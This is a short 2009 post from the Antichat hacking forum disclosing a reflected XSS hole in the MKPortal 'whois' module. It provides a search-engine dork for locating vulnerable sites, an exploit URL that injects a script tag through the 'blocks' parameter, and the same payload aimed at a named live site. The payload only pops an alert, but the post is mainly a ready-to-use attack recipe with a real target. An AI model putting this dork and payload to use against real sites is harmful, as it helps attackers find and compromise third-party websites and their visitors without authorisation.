27.01.2009, 00:48
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
MKPortal module whois
Уязвимый продукт: MKPortal module whois
Дорк: "inurl:index.php?ind=whois"
1. pXSS
Уязвимость в файле index.php.
Exploit:
Код:
/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E
Example:
Код:
http://kitimedia.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E
__________________
Появляюсь редко. Важные дела в реале.
|
|
|